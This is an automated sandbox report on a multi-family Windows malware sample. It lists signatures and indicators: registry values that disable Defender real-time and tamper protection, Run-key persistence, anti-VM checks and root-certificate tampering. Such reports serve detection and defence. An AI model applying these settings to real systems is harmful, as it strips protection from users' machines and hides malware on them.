Malware Analysis Report

2025-01-22 14:58

Sample ID 241206-cywjja1pbk
Target 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe
SHA256 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e
Tags
amadey gcleaner lumma orcus stealc 9c9aa5 drum discovery evasion execution loader persistence rat spyware stealer trojan ta505 xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e

Threat Level: Known bad

The file 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe was found to be: Known bad.

Malicious Activity Summary

amadey gcleaner lumma orcus stealc 9c9aa5 drum discovery evasion execution loader persistence rat spyware stealer trojan ta505 xmrig miner

Modifies Windows Defender Real-time Protection settings

GCleaner

Suspicious use of NtCreateUserProcessOtherParentProcess

Orcus

Amadey

Lumma Stealer, LummaC

Lumma family

Ta505 family

Stealc family

Amadey family

Xmrig family

Orcus family

xmrig

Stealc

TA505

Gcleaner family

XMRig Miner payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Orcurs Rat Executable

Blocklisted process makes network request

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Windows security modification

Checks BIOS information in registry

Checks computer location settings

Identifies Wine through registry keys

Reads user/profile data of web browsers

Loads dropped DLL

Checks installed software on the system

Looks up external IP address via web service

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

AutoIT Executable

Enumerates processes with tasklist

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

System Location Discovery: System Language Discovery

Uses Task Scheduler COM API

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

Checks processor information in registry

Scheduled Task/Job: Scheduled Task

Modifies registry class

Runs net.exe

Kills process with taskkill

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-06 02:29

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-06 02:29

Reported

2024-12-06 02:32

Platform

win7-20240729-en

Max time kernel

148s

Max time network

149s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A

Orcus

rat spyware stealer orcus

Orcus family

orcus

Stealc

stealer stealc

Stealc family

stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1544 created 1284 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\Explorer.EXE

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012579001\d3b8f2d358.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012580001\d902cee6ea.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012581001\7329de9159.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Orcurs Rat Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012580001\d902cee6ea.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012581001\7329de9159.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012579001\d3b8f2d358.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012580001\d902cee6ea.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012579001\d3b8f2d358.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012581001\7329de9159.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012579001\d3b8f2d358.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012580001\d902cee6ea.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012581001\7329de9159.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\d902cee6ea.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012580001\\d902cee6ea.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\7329de9159.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012581001\\7329de9159.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\a01c94d9d9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012582001\\a01c94d9d9.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\8785c75487.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012583001\\8785c75487.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\SmartScreen = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smartscreen.exe" C:\Users\Admin\AppData\Local\Temp\smartscreen.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\skotes.job C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
File opened for modification C:\Windows\MovieArchives C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
File opened for modification C:\Windows\PackageExpression C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\choice.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012580001\d902cee6ea.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012582001\a01c94d9d9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\1012582001\a01c94d9d9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012579001\d3b8f2d358.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\1012582001\a01c94d9d9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012581001\7329de9159.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\find.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\1012580001\d902cee6ea.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\1012580001\d902cee6ea.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\1012580001\d902cee6ea.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe N/A
